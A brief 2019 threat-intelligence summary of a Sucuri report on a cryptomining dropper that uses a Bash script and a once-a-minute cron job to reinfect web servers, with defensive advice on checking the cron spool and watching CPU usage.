Cryptomining Dropper and Cronjob Creator (Jun 19, 2019)
A cryptomining dropper malware has been reported on by Sucuri researchers after receiving information from an unknown individual who had discovered a process running on their web server. Using a Bash script on the server, threat actors are able to download the cryptominer to the victims’ systems; as of this writing, it is unknown how actors initially compromised the servers however it is likely through an unpatched vulnerability, brute force or phishing for admin credentials. The Bash script looks for any other cryptomining processes that are already running, kills any it finds, and subsequently downloads the cryptominer. The payload and configuration file are deleted to hide the miner’s presence. To gain persistence, a cron job runs every minute to checking for the Bash script, downloading and executing again if it has been removed. This enables the malware to reinfect the host when all malicious files have been removed.
Recommendation: The cron spool should be checked after any security incident and as part of scan, as it can continue to reinfect your system. Cryptocurrency miners cause a high CPU usage, therefore if fans seem to be always running on a machine, the activity/task manager should be checked to see if miners are unknowingly running.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.